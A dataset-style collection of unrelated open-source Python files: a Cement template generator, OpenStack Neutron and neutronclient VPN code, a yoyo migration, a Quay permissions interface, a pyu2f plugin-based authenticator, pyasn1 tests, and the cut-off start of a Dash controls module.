data['cement']['version'] = get_version()
data['cement']['major_version'] = VERSION[0]
data['cement']['minor_version'] = VERSION[1]
data['cement']['major_minor_version'] = maj_min
f = open(os.path.join(source, '.generate.yml'))
yaml_load = yaml.full_load if hasattr(yaml, 'full_load') else yaml.load
g_config = yaml_load(f)
f.close()
vars = g_config.get('variables', {})
exclude_list = g_config.get('exclude', [])
ignore_list = g_config.get('ignore', [])
# default ignore the .generate.yml config
g_config_yml = r'^(.*)[\/\\\\]%s[\/\\\\]\.generate\.yml$' % \
self._meta.label
ignore_list.append(g_config_yml)
var_defaults = {
'name': None,
'prompt': None,
'validate': None,
'case': None,
'default': None,
}
for defined_var in vars:
var = var_defaults.copy()
var.update(defined_var)
for key in ['name', 'prompt']:
assert var[key] is not None, \
"Required generate config key missing: %s" % key
val = None
if var['default'] is not None and self.app.pargs.defaults:
val = var['default']
elif var['default'] is not None:
default_text = ' [%s]' % var['default']
else:
default_text = '' # pragma: nocover
if val is None:
class MyPrompt(shell.Prompt):
class Meta:
text = "%s%s:" % (var['prompt'], default_text)
default = var.get('default', None)
p = MyPrompt()
val = p.prompt() # pragma: nocover
if var['case'] in ['lower', 'upper', 'title']:
val = getattr(val, var['case'])()
elif var['case'] is not None:
self.app.log.warning(
"Invalid configuration for variable " +
"'%s': " % var['name'] +
"case must be one of lower, upper, or title."
)
if var['validate'] is not None:
assert re.match(var['validate'], val), \
"Invalid Response (must match: '%s')" % var['validate']
data[var['name']] = val
try:
self.app.template.copy(source, dest, data,
force=self.app.pargs.force,
ignore=ignore_list,
exclude=exclude_list)
except AssertionError as e:
if re.match('(.*)already exists(.*)', e.args[0]):
raise AssertionError(e.args[0] + ' (try: --force)')
else:
raise # pragma: nocover
def _clone(self, source, dest):
msg = 'Cloning %s %s template to %s' % (
self.app._meta.label, self._meta.label, dest
)
self.app.log.info(msg)
if os.path.exists(dest) and self.app.pargs.force is True:
shutil.rmtree(dest)
elif os.path.exists(dest):
msg = "Destination path already exists: %s (try: --force)" % dest
raise AssertionError(msg)
shutil.copytree(source, dest)
def _default(self):
source = self._meta.source_path
dest = self.app.pargs.dest
if self.app.pargs.clone is True:
self._clone(source, dest)
else:
self._generate(source, dest)
def setup_template_items(app):
template_dirs = []
template_items = []
# look in app template dirs
for path in app._meta.template_dirs:
subpath = os.path.join(path, 'generate')
if os.path.exists(subpath) and subpath not in template_dirs:
template_dirs.append(subpath)
# use app template module, find it's path on filesystem
if app._meta.template_module is not None:
mod_parts = app._meta.template_module.split('.')
mod = mod_parts.pop()
try:
mod = app.__import__(mod, from_module='.'.join(mod_parts))
mod_path = os.path.dirname(inspect.getfile(mod))
subpath = os.path.join(mod_path, 'generate')
if os.path.exists(subpath) and subpath not in template_dirs:
template_dirs.append(subpath)
# FIXME: not exactly sure how to test for this so not covering
except AttributeError: # pragma: nocover
            msg = 'unable to load template module ' + \
'%s from %s' % (mod, '.'.join(mod_parts)) # pragma: nocover
app.log.debug(msg) # pragma: nocover
for path in template_dirs:
for item in os.listdir(path):
if item not in template_items:
template_items.append(item)
class GenerateTemplate(GenerateTemplateAbstractBase):
class Meta:
label = item
stacked_on = 'generate'
stacked_type = 'nested'
help = 'generate %s from template' % item
arguments = [
# ------------------------------------------------------
(['dest'],
{'help': 'destination directory path'}),
# ------------------------------------------------------
(['-f', '--force'],
{'help': 'force operation if destination exists',
'dest': 'force',
'action': 'store_true'}),
# ------------------------------------------------------
(['-D', '--defaults'],
{'help': 'use all default variable values',
'dest': 'defaults',
'action': 'store_true'}),
# ------------------------------------------------------
(['--clone'],
{'help': 'clone this template to destination path',
'dest': 'clone',
'action': 'store_true'}),
]
source_path = os.path.join(path, item)
app.handler.register(GenerateTemplate)
class Generate(Controller):
class Meta:
label = 'generate'
stacked_on = 'base'
stacked_type = 'nested'
config_section = 'generate'
def _setup(self, app):
super(Generate, self)._setup(app)
def _default(self):
self._parser.print_help()
def load(app):
app.handler.register(Generate)
app.hook.register('pre_run', setup_template_items)
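# Illustrative template config (an assumption, not shipped with this module): a sketch of
# the ``.generate.yml`` file that ``_generate()`` above reads. The top-level keys mirror
# the ``g_config`` lookups (``variables``, ``exclude``, ``ignore``) and each variable entry
# uses the keys from ``var_defaults`` (``name``, ``prompt``, ``validate``, ``case``,
# ``default``).
#
#   variables:
#     - name: app_label
#       prompt: Application label
#       validate: "^[a-z][a-z0-9_]*$"
#       case: lower
#       default: myapp
#   exclude:
#     - ".*\\.pyc$"
#   ignore:
#     - "^(.*)/private/(.*)$"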
|
neutron/agent/ovsdb/native/helpers.py | congnt95/neutron | 1,080 | 8609 | # Copyright (c) 2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
from oslo_config import cfg
from neutron.conf.agent import ovs_conf as agent_ovs_conf
from neutron.conf.plugins.ml2.drivers import ovs_conf as ml2_ovs_conf
from neutron.privileged.agent.ovsdb.native import helpers as priv_helpers
agent_ovs_conf.register_ovs_agent_opts(cfg.CONF)
ml2_ovs_conf.register_ovs_opts(cfg=cfg.CONF)
enable_connection_uri = functools.partial(
priv_helpers.enable_connection_uri,
log_fail_as_error=False, check_exit_code=False,
timeout=cfg.CONF.OVS.ovsdb_timeout,
inactivity_probe=cfg.CONF.OVS.of_inactivity_probe * 1000)
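# Illustrative call (an assumption about callers, which live outside this module): the
# partial above is typically invoked with just an OVSDB connection URI, e.g.
#
#   helpers.enable_connection_uri('tcp:127.0.0.1:6640')
#
# with the timeout and inactivity-probe keyword arguments already bound from configuration.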
|
migrations/20220114_03_Heqaz-insert-default-serverinfo.py | lin483/Funny-Nations | 126 | 8621 | <gh_stars>100-1000
"""
insert default serverInfo
"""
from yoyo import step
__depends__ = {'20220114_02_lHBKM-new-table-serverinfo'}
steps = [
step("INSERT INTO `serverInfo` (`onlineMinute`) VALUES (0);")
]
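# Note (illustrative, not part of the original migration): yoyo's ``step`` also accepts a
# rollback statement as its second argument, which would make this migration reversible:
#
#   step("INSERT INTO `serverInfo` (`onlineMinute`) VALUES (0);",
#        "DELETE FROM `serverInfo` WHERE `onlineMinute` = 0;")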
|
neutronclient/osc/v2/vpnaas/ipsec_site_connection.py | slawqo/python-neutronclient | 120 | 8622 | <gh_stars>100-1000
# Copyright 2017 FUJITSU LIMITED
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from osc_lib.cli import format_columns
from osc_lib.command import command
from osc_lib import exceptions
from osc_lib import utils
from osc_lib.utils import columns as column_util
from oslo_log import log as logging
from neutronclient._i18n import _
from neutronclient.common import utils as nc_utils
from neutronclient.osc import utils as osc_utils
from neutronclient.osc.v2.vpnaas import utils as vpn_utils
LOG = logging.getLogger(__name__)
_formatters = {
'peer_cidrs': format_columns.ListColumn
}
_attr_map = (
('id', 'ID', column_util.LIST_BOTH),
('name', 'Name', column_util.LIST_BOTH),
('peer_address', 'Peer Address', column_util.LIST_BOTH),
('auth_mode', 'Authentication Algorithm', column_util.LIST_BOTH),
('status', 'Status', column_util.LIST_BOTH),
('tenant_id', 'Project', column_util.LIST_LONG_ONLY),
('peer_cidrs', 'Peer CIDRs', column_util.LIST_LONG_ONLY),
('vpnservice_id', 'VPN Service', column_util.LIST_LONG_ONLY),
('ipsecpolicy_id', 'IPSec Policy', column_util.LIST_LONG_ONLY),
('ikepolicy_id', 'IKE Policy', column_util.LIST_LONG_ONLY),
('mtu', 'MTU', column_util.LIST_LONG_ONLY),
('initiator', 'Initiator', column_util.LIST_LONG_ONLY),
('admin_state_up', 'State', column_util.LIST_LONG_ONLY),
('description', 'Description', column_util.LIST_LONG_ONLY),
('psk', 'Pre-shared Key', column_util.LIST_LONG_ONLY),
('route_mode', 'Route Mode', column_util.LIST_LONG_ONLY),
('local_id', 'Local ID', column_util.LIST_LONG_ONLY),
('peer_id', 'Peer ID', column_util.LIST_LONG_ONLY),
('local_ep_group_id', 'Local Endpoint Group ID',
column_util.LIST_LONG_ONLY),
('peer_ep_group_id', 'Peer Endpoint Group ID', column_util.LIST_LONG_ONLY),
)
def _convert_to_lowercase(string):
return string.lower()
def _get_common_parser(parser, is_create=True):
parser.add_argument(
'--description',
metavar='<description>',
help=_('Description for the connection'))
parser.add_argument(
'--dpd',
metavar="action=ACTION,interval=INTERVAL,timeout=TIMEOUT",
type=nc_utils.str2dict_type(
optional_keys=['action', 'interval', 'timeout']),
help=vpn_utils.dpd_help("IPsec connection"))
parser.add_argument(
'--mtu',
help=_('MTU size for the connection'))
parser.add_argument(
'--initiator',
choices=['bi-directional', 'response-only'],
type=_convert_to_lowercase,
help=_('Initiator state'))
peer_group = parser.add_mutually_exclusive_group()
peer_group.add_argument(
'--peer-cidr',
dest='peer_cidrs',
help=_('Remote subnet(s) in CIDR format. '
'Cannot be specified when using endpoint groups. Only '
'applicable, if subnet provided for VPN service.')
)
peer_group.add_argument(
'--local-endpoint-group',
help=_('Local endpoint group (name or ID) with subnet(s) '
'for IPsec connection')
)
parser.add_argument(
'--peer-endpoint-group',
help=_('Peer endpoint group (name or ID) with CIDR(s) for '
'IPSec connection'))
admin_group = parser.add_mutually_exclusive_group()
admin_group.add_argument(
'--enable',
action='store_true',
help=_("Enable IPSec site connection")
)
admin_group.add_argument(
'--disable',
action='store_true',
help=_("Disable IPSec site connection")
)
parser.add_argument(
'--local-id',
help=_('An ID to be used instead of the external IP '
'address for a virtual router'))
return parser
def _get_common_attrs(client_manager, parsed_args, is_create=True):
attrs = {}
if is_create:
if 'project' in parsed_args and parsed_args.project is not None:
attrs['tenant_id'] = osc_utils.find_project(
client_manager.identity,
parsed_args.project,
parsed_args.project_domain,
).id
if parsed_args.description:
attrs['description'] = str(parsed_args.description)
if parsed_args.mtu:
attrs['mtu'] = parsed_args.mtu
if parsed_args.enable:
attrs['admin_state_up'] = True
if parsed_args.disable:
attrs['admin_state_up'] = False
if parsed_args.initiator:
attrs['initiator'] = parsed_args.initiator
if parsed_args.dpd:
vpn_utils.validate_dpd_dict(parsed_args.dpd)
attrs['dpd'] = parsed_args.dpd
if parsed_args.local_endpoint_group:
_local_epg = client_manager.neutronclient.find_resource(
'endpoint_group',
parsed_args.local_endpoint_group,
cmd_resource='endpoint_group')['id']
attrs['local_ep_group_id'] = _local_epg
if parsed_args.peer_endpoint_group:
_peer_epg = client_manager.neutronclient.find_resource(
'endpoint_group',
parsed_args.peer_endpoint_group,
cmd_resource='endpoint_group')['id']
attrs['peer_ep_group_id'] = _peer_epg
if parsed_args.peer_cidrs:
attrs['peer_cidrs'] = parsed_args.peer_cidrs
if parsed_args.local_id:
attrs['local_id'] = parsed_args.local_id
return attrs
class CreateIPsecSiteConnection(command.ShowOne):
_description = _("Create an IPsec site connection")
def get_parser(self, prog_name):
parser = super(CreateIPsecSiteConnection, self).get_parser(prog_name)
_get_common_parser(parser)
parser.add_argument(
'--peer-id',
required=True,
help=_('Peer router identity for authentication. Can be '
'IPv4/IPv6 address, e-mail address, key id, or FQDN'))
parser.add_argument(
'--peer-address',
required=True,
help=_('Peer gateway public IPv4/IPv6 address or FQDN'))
parser.add_argument(
'--psk',
required=True,
help=_('Pre-shared key string.'))
parser.add_argument(
'--vpnservice',
metavar='VPNSERVICE',
required=True,
help=_('VPN service instance associated with this '
'connection (name or ID)'))
parser.add_argument(
'--ikepolicy',
metavar='IKEPOLICY',
required=True,
help=_('IKE policy associated with this connection (name or ID)'))
parser.add_argument(
'--ipsecpolicy',
metavar='IPSECPOLICY',
required=True,
help=_('IPsec policy associated with this connection '
'(name or ID)'))
parser.add_argument(
'name',
metavar='<name>',
help=_('Set friendly name for the connection'))
osc_utils.add_project_owner_option_to_parser(parser)
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.neutronclient
attrs = _get_common_attrs(self.app.client_manager, parsed_args)
if parsed_args.vpnservice:
_vpnservice_id = client.find_resource(
'vpnservice',
parsed_args.vpnservice,
cmd_resource='vpnservice')['id']
attrs['vpnservice_id'] = _vpnservice_id
if parsed_args.ikepolicy:
_ikepolicy_id = client.find_resource(
'ikepolicy',
parsed_args.ikepolicy,
cmd_resource='ikepolicy')['id']
attrs['ikepolicy_id'] = _ikepolicy_id
if parsed_args.ipsecpolicy:
_ipsecpolicy_id = client.find_resource(
'ipsecpolicy',
parsed_args.ipsecpolicy,
cmd_resource='ipsecpolicy')['id']
attrs['ipsecpolicy_id'] = _ipsecpolicy_id
if parsed_args.peer_id:
attrs['peer_id'] = parsed_args.peer_id
if parsed_args.peer_address:
attrs['peer_address'] = parsed_args.peer_address
if parsed_args.psk:
attrs['psk'] = parsed_args.psk
if parsed_args.name:
attrs['name'] = parsed_args.name
if (bool(parsed_args.local_endpoint_group) !=
bool(parsed_args.peer_endpoint_group)):
message = _("You must specify both local and peer endpoint "
"groups")
raise exceptions.CommandError(message)
if not parsed_args.peer_cidrs and not parsed_args.local_endpoint_group:
message = _("You must specify endpoint groups or peer CIDR(s)")
raise exceptions.CommandError(message)
obj = client.create_ipsec_site_connection(
{'ipsec_site_connection': attrs})['ipsec_site_connection']
columns, display_columns = column_util.get_columns(obj, _attr_map)
data = utils.get_dict_properties(obj, columns, formatters=_formatters)
return display_columns, data
class DeleteIPsecSiteConnection(command.Command):
_description = _("Delete IPsec site connection(s)")
def get_parser(self, prog_name):
parser = super(DeleteIPsecSiteConnection, self).get_parser(prog_name)
parser.add_argument(
'ipsec_site_connection',
metavar='<ipsec-site-connection>',
nargs='+',
help=_('IPsec site connection to delete (name or ID)'))
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.neutronclient
result = 0
for ipsec_conn in parsed_args.ipsec_site_connection:
try:
ipsec_con_id = client.find_resource(
'ipsec_site_connection',
ipsec_conn,
cmd_resource='ipsec_site_connection')['id']
client.delete_ipsec_site_connection(ipsec_con_id)
except Exception as e:
result += 1
LOG.error(_("Failed to delete IPsec site connection with "
"name or ID '%(ipsec_site_conn)s': %(e)s"),
{'ipsec_site_conn': ipsec_conn, 'e': e})
if result > 0:
total = len(parsed_args.ipsec_site_connection)
msg = (_("%(result)s of %(total)s IPsec site connection failed "
"to delete.") % {'result': result, 'total': total})
raise exceptions.CommandError(msg)
class ListIPsecSiteConnection(command.Lister):
_description = _("List IPsec site connections "
"that belong to a given project")
def get_parser(self, prog_name):
parser = super(ListIPsecSiteConnection, self).get_parser(prog_name)
parser.add_argument(
'--long',
action='store_true',
default=False,
help=_("List additional fields in output")
)
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.neutronclient
obj = client.list_ipsec_site_connections()['ipsec_site_connections']
headers, columns = column_util.get_column_definitions(
_attr_map, long_listing=parsed_args.long)
return (headers, (utils.get_dict_properties(
s, columns, formatters=_formatters) for s in obj))
class SetIPsecSiteConnection(command.Command):
_description = _("Set IPsec site connection properties")
def get_parser(self, prog_name):
parser = super(SetIPsecSiteConnection, self).get_parser(prog_name)
_get_common_parser(parser)
parser.add_argument(
'--peer-id',
help=_('Peer router identity for authentication. Can be '
'IPv4/IPv6 address, e-mail address, key id, or FQDN'))
parser.add_argument(
'--peer-address',
help=_('Peer gateway public IPv4/IPv6 address or FQDN'))
parser.add_argument(
'--name',
metavar='<name>',
help=_('Set friendly name for the connection'))
parser.add_argument(
'ipsec_site_connection',
metavar='<ipsec-site-connection>',
help=_('IPsec site connection to set (name or ID)'))
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.neutronclient
attrs = _get_common_attrs(self.app.client_manager,
parsed_args, is_create=False)
if parsed_args.peer_id:
attrs['peer_id'] = parsed_args.peer_id
if parsed_args.peer_address:
attrs['peer_address'] = parsed_args.peer_address
if parsed_args.name:
attrs['name'] = parsed_args.name
ipsec_conn_id = client.find_resource(
'ipsec_site_connection', parsed_args.ipsec_site_connection,
cmd_resource='ipsec_site_connection')['id']
try:
client.update_ipsec_site_connection(
ipsec_conn_id,
{'ipsec_site_connection': attrs})
except Exception as e:
msg = (_("Failed to set IPsec site "
"connection '%(ipsec_conn)s': %(e)s")
% {'ipsec_conn': parsed_args.ipsec_site_connection, 'e': e})
raise exceptions.CommandError(msg)
class ShowIPsecSiteConnection(command.ShowOne):
_description = _("Show information of a given IPsec site connection")
def get_parser(self, prog_name):
parser = super(ShowIPsecSiteConnection, self).get_parser(prog_name)
parser.add_argument(
'ipsec_site_connection',
metavar='<ipsec-site-connection>',
help=_('IPsec site connection to display (name or ID)'))
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.neutronclient
ipsec_site_id = client.find_resource(
'ipsec_site_connection', parsed_args.ipsec_site_connection,
cmd_resource='ipsec_site_connection')['id']
obj = client.show_ipsec_site_connection(
ipsec_site_id)['ipsec_site_connection']
columns, display_columns = column_util.get_columns(obj, _attr_map)
data = utils.get_dict_properties(obj, columns, formatters=_formatters)
return (display_columns, data)
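# Illustrative CLI usage (an assumption about how these command classes are exposed through
# python-openstackclient entry points; exact command names can vary by release):
#
#   openstack vpn ipsec site connection create \
#       --vpnservice myvpn --ikepolicy myike --ipsecpolicy myipsec \
#       --peer-address 203.0.113.10 --peer-id 203.0.113.10 \
#       --peer-cidr 10.1.0.0/24 --psk sharedsecret myconnection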
|
endpoints/api/permission_models_interface.py | giuseppe/quay | 2,027 | 8631 | <gh_stars>1000+
import sys
from abc import ABCMeta, abstractmethod
from collections import namedtuple
from six import add_metaclass
class SaveException(Exception):
def __init__(self, other):
self.traceback = sys.exc_info()
super(SaveException, self).__init__(str(other))
class DeleteException(Exception):
def __init__(self, other):
self.traceback = sys.exc_info()
super(DeleteException, self).__init__(str(other))
class Role(namedtuple("Role", ["role_name"])):
def to_dict(self):
return {
"role": self.role_name,
}
class UserPermission(
namedtuple(
"UserPermission",
[
"role_name",
"username",
"is_robot",
"avatar",
"is_org_member",
"has_org",
],
)
):
def to_dict(self):
perm_dict = {
"role": self.role_name,
"name": self.username,
"is_robot": self.is_robot,
"avatar": self.avatar,
}
if self.has_org:
perm_dict["is_org_member"] = self.is_org_member
return perm_dict
class RobotPermission(
namedtuple(
"RobotPermission",
[
"role_name",
"username",
"is_robot",
"is_org_member",
],
)
):
def to_dict(self, user=None, team=None, org_members=None):
return {
"role": self.role_name,
"name": self.username,
"is_robot": True,
"is_org_member": self.is_org_member,
}
class TeamPermission(
namedtuple(
"TeamPermission",
[
"role_name",
"team_name",
"avatar",
],
)
):
def to_dict(self):
return {
"role": self.role_name,
"name": self.team_name,
"avatar": self.avatar,
}
@add_metaclass(ABCMeta)
class PermissionDataInterface(object):
"""
Data interface used by permissions API.
"""
@abstractmethod
def get_repo_permissions_by_user(self, namespace_name, repository_name):
"""
Args:
namespace_name: string
repository_name: string
Returns:
list(UserPermission)
"""
@abstractmethod
def get_repo_roles(self, username, namespace_name, repository_name):
"""
Args:
username: string
namespace_name: string
repository_name: string
Returns:
list(Role) or None
"""
@abstractmethod
def get_repo_permission_for_user(self, username, namespace_name, repository_name):
"""
Args:
username: string
namespace_name: string
repository_name: string
Returns:
UserPermission
"""
@abstractmethod
def set_repo_permission_for_user(self, username, namespace_name, repository_name, role_name):
"""
Args:
username: string
namespace_name: string
repository_name: string
role_name: string
Returns:
UserPermission
Raises:
SaveException
"""
@abstractmethod
def delete_repo_permission_for_user(self, username, namespace_name, repository_name):
"""
Args:
username: string
namespace_name: string
repository_name: string
Returns:
void
Raises:
DeleteException
"""
@abstractmethod
def get_repo_permissions_by_team(self, namespace_name, repository_name):
"""
Args:
namespace_name: string
repository_name: string
Returns:
list(TeamPermission)
"""
@abstractmethod
def get_repo_role_for_team(self, team_name, namespace_name, repository_name):
"""
Args:
team_name: string
namespace_name: string
repository_name: string
Returns:
Role
"""
@abstractmethod
def set_repo_permission_for_team(self, team_name, namespace_name, repository_name, permission):
"""
Args:
team_name: string
namespace_name: string
repository_name: string
permission: string
Returns:
TeamPermission
Raises:
SaveException
"""
@abstractmethod
def delete_repo_permission_for_team(self, team_name, namespace_name, repository_name):
"""
Args:
team_name: string
namespace_name: string
repository_name: string
Returns:
TeamPermission
Raises:
DeleteException
"""
|
desktop/core/ext-py/pyu2f-0.1.4/pyu2f/convenience/customauthenticator.py | yetsun/hue | 5,079 | 8643 | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Class to offload the end to end flow of U2F signing."""
import base64
import hashlib
import json
import os
import struct
import subprocess
import sys
from pyu2f import errors
from pyu2f import model
from pyu2f.convenience import baseauthenticator
SK_SIGNING_PLUGIN_ENV_VAR = 'SK_SIGNING_PLUGIN'
U2F_SIGNATURE_TIMEOUT_SECONDS = 5
SK_SIGNING_PLUGIN_NO_ERROR = 0
SK_SIGNING_PLUGIN_TOUCH_REQUIRED = 0x6985
SK_SIGNING_PLUGIN_WRONG_DATA = 0x6A80
class CustomAuthenticator(baseauthenticator.BaseAuthenticator):
"""Offloads U2F signing to a pluggable command-line tool.
Offloads U2F signing to a signing plugin which takes the form of a
command-line tool. The command-line tool is configurable via the
SK_SIGNING_PLUGIN environment variable.
The signing plugin should implement the following interface:
Communication occurs over stdin/stdout, and messages are both sent and
received in the form:
[4 bytes - payload size (little-endian)][variable bytes - json payload]
Signing Request JSON
{
"type": "sign_helper_request",
"signData": [{
"keyHandle": <url-safe base64-encoded key handle>,
"appIdHash": <url-safe base64-encoded SHA-256 hash of application ID>,
"challengeHash": <url-safe base64-encoded SHA-256 hash of ClientData>,
"version": U2F protocol version (usually "U2F_V2")
},...],
"timeoutSeconds": <security key touch timeout>
}
Signing Response JSON
{
"type": "sign_helper_reply",
"code": <result code>.
"errorDetail": <text description of error>,
"responseData": {
"appIdHash": <url-safe base64-encoded SHA-256 hash of application ID>,
"challengeHash": <url-safe base64-encoded SHA-256 hash of ClientData>,
"keyHandle": <url-safe base64-encoded key handle>,
"version": <U2F protocol version>,
"signatureData": <url-safe base64-encoded signature>
}
}
Possible response error codes are:
NoError = 0
UnknownError = -127
TouchRequired = 0x6985
WrongData = 0x6a80
"""
def __init__(self, origin):
self.origin = origin
def Authenticate(self, app_id, challenge_data,
print_callback=sys.stderr.write):
"""See base class."""
# Ensure environment variable is present
plugin_cmd = os.environ.get(SK_SIGNING_PLUGIN_ENV_VAR)
if plugin_cmd is None:
raise errors.PluginError('{} env var is not set'
.format(SK_SIGNING_PLUGIN_ENV_VAR))
# Prepare input to signer
client_data_map, signing_input = self._BuildPluginRequest(
app_id, challenge_data, self.origin)
# Call plugin
print_callback('Please insert and touch your security key\n')
response = self._CallPlugin([plugin_cmd], signing_input)
# Handle response
key_challenge_pair = (response['keyHandle'], response['challengeHash'])
client_data_json = client_data_map[key_challenge_pair]
client_data = client_data_json.encode()
return self._BuildAuthenticatorResponse(app_id, client_data, response)
def IsAvailable(self):
"""See base class."""
return os.environ.get(SK_SIGNING_PLUGIN_ENV_VAR) is not None
def _BuildPluginRequest(self, app_id, challenge_data, origin):
"""Builds a JSON request in the form that the plugin expects."""
client_data_map = {}
encoded_challenges = []
app_id_hash_encoded = self._Base64Encode(self._SHA256(app_id))
for challenge_item in challenge_data:
key = challenge_item['key']
key_handle_encoded = self._Base64Encode(key.key_handle)
raw_challenge = challenge_item['challenge']
client_data_json = model.ClientData(
model.ClientData.TYP_AUTHENTICATION,
raw_challenge,
origin).GetJson()
challenge_hash_encoded = self._Base64Encode(
self._SHA256(client_data_json))
# Populate challenges list
encoded_challenges.append({
'appIdHash': app_id_hash_encoded,
'challengeHash': challenge_hash_encoded,
'keyHandle': key_handle_encoded,
'version': key.version,
})
# Populate ClientData map
key_challenge_pair = (key_handle_encoded, challenge_hash_encoded)
client_data_map[key_challenge_pair] = client_data_json
signing_request = {
'type': 'sign_helper_request',
'signData': encoded_challenges,
'timeoutSeconds': U2F_SIGNATURE_TIMEOUT_SECONDS,
'localAlways': True
}
return client_data_map, json.dumps(signing_request)
def _BuildAuthenticatorResponse(self, app_id, client_data, plugin_response):
"""Builds the response to return to the caller."""
encoded_client_data = self._Base64Encode(client_data)
signature_data = str(plugin_response['signatureData'])
key_handle = str(plugin_response['keyHandle'])
response = {
'clientData': encoded_client_data,
'signatureData': signature_data,
'applicationId': app_id,
'keyHandle': key_handle,
}
return response
def _CallPlugin(self, cmd, input_json):
"""Calls the plugin and validates the response."""
# Calculate length of input
input_length = len(input_json)
length_bytes_le = struct.pack('<I', input_length)
request = length_bytes_le + input_json.encode()
# Call plugin
sign_process = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
stdout = sign_process.communicate(request)[0]
exit_status = sign_process.wait()
# Parse and validate response size
response_len_le = stdout[:4]
response_len = struct.unpack('<I', response_len_le)[0]
response = stdout[4:]
if response_len != len(response):
raise errors.PluginError(
'Plugin response length {} does not match data {} (exit_status={})'
.format(response_len, len(response), exit_status))
# Ensure valid json
try:
json_response = json.loads(response.decode())
except ValueError:
raise errors.PluginError('Plugin returned invalid output (exit_status={})'
.format(exit_status))
# Ensure response type
if json_response.get('type') != 'sign_helper_reply':
raise errors.PluginError('Plugin returned invalid response type '
'(exit_status={})'
.format(exit_status))
# Parse response codes
result_code = json_response.get('code')
if result_code is None:
raise errors.PluginError('Plugin missing result code (exit_status={})'
.format(exit_status))
# Handle errors
if result_code == SK_SIGNING_PLUGIN_TOUCH_REQUIRED:
raise errors.U2FError(errors.U2FError.TIMEOUT)
elif result_code == SK_SIGNING_PLUGIN_WRONG_DATA:
raise errors.U2FError(errors.U2FError.DEVICE_INELIGIBLE)
elif result_code != SK_SIGNING_PLUGIN_NO_ERROR:
raise errors.PluginError(
'Plugin failed with error {} - {} (exit_status={})'
.format(result_code,
json_response.get('errorDetail'),
exit_status))
# Ensure response data is present
response_data = json_response.get('responseData')
if response_data is None:
      raise errors.PluginError(
'Plugin returned output with missing responseData (exit_status={})'
.format(exit_status))
return response_data
def _SHA256(self, string):
"""Helper method to perform SHA256."""
md = hashlib.sha256()
md.update(string.encode())
return md.digest()
def _Base64Encode(self, bytes_data):
"""Helper method to base64 encode, strip padding, and return str
result."""
return base64.urlsafe_b64encode(bytes_data).decode().rstrip('=')
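# Illustrative plugin skeleton (an assumption, not part of pyu2f): the executable named by
# SK_SIGNING_PLUGIN is expected to speak the 4-byte little-endian length-prefixed JSON
# framing documented in the class docstring and enforced by _CallPlugin, e.g.
#
#   raw_len = sys.stdin.buffer.read(4)
#   request = json.loads(sys.stdin.buffer.read(struct.unpack('<I', raw_len)[0]))
#   reply = json.dumps({'type': 'sign_helper_reply', 'code': 0, 'errorDetail': '',
#                       'responseData': {}}).encode()  # responseData filled in by the plugin
#   sys.stdout.buffer.write(struct.pack('<I', len(reply)) + reply)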
|
desktop/core/ext-py/pyasn1-0.4.6/tests/type/test_namedval.py | yetsun/hue | 5,079 | 8694 | <filename>desktop/core/ext-py/pyasn1-0.4.6/tests/type/test_namedval.py<gh_stars>1000+
#
# This file is part of pyasn1 software.
#
# Copyright (c) 2005-2019, <NAME> <<EMAIL>>
# License: http://snmplabs.com/pyasn1/license.html
#
import sys
try:
import unittest2 as unittest
except ImportError:
import unittest
from tests.base import BaseTestCase
from pyasn1.type import namedval
class NamedValuesCaseBase(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.e = namedval.NamedValues(('off', 0), ('on', 1))
def testDict(self):
assert set(self.e.items()) == set([('off', 0), ('on', 1)])
assert set(self.e.keys()) == set(['off', 'on'])
assert set(self.e) == set(['off', 'on'])
assert set(self.e.values()) == set([0, 1])
assert 'on' in self.e and 'off' in self.e and 'xxx' not in self.e
assert 0 in self.e and 1 in self.e and 2 not in self.e
def testInit(self):
assert namedval.NamedValues(off=0, on=1) == {'off': 0, 'on': 1}
assert namedval.NamedValues('off', 'on') == {'off': 0, 'on': 1}
assert namedval.NamedValues(('c', 0)) == {'c': 0}
assert namedval.NamedValues('a', 'b', ('c', 0), d=1) == {'c': 0, 'd': 1, 'a': 2, 'b': 3}
def testLen(self):
assert len(self.e) == 2
assert len(namedval.NamedValues()) == 0
def testAdd(self):
assert namedval.NamedValues(off=0) + namedval.NamedValues(on=1) == {'off': 0, 'on': 1}
def testClone(self):
assert namedval.NamedValues(off=0).clone(('on', 1)) == {'off': 0, 'on': 1}
assert namedval.NamedValues(off=0).clone(on=1) == {'off': 0, 'on': 1}
def testStrRepr(self):
assert str(self.e)
assert repr(self.e)
suite = unittest.TestLoader().loadTestsFromModule(sys.modules[__name__])
if __name__ == '__main__':
unittest.TextTestRunner(verbosity=2).run(suite)
|
apps/dash-port-analytics/app/ui/tab_map_controls.py | JeroenvdSande/dash-sample-apps | 2,332 | 8721 | <reponame>JeroenvdSande/dash-sample-apps
import dash_core_components as dcc
import dash_html_components as html
from config import strings
def make_tab_port_map_controls(
port_arr: list,
port_val: str,
vessel_types_arr: list,
vessel_type_val: str,
year_arr: list,
year_val: int,
month_arr: list,
month_val: int,
) -> html.Div:
"""
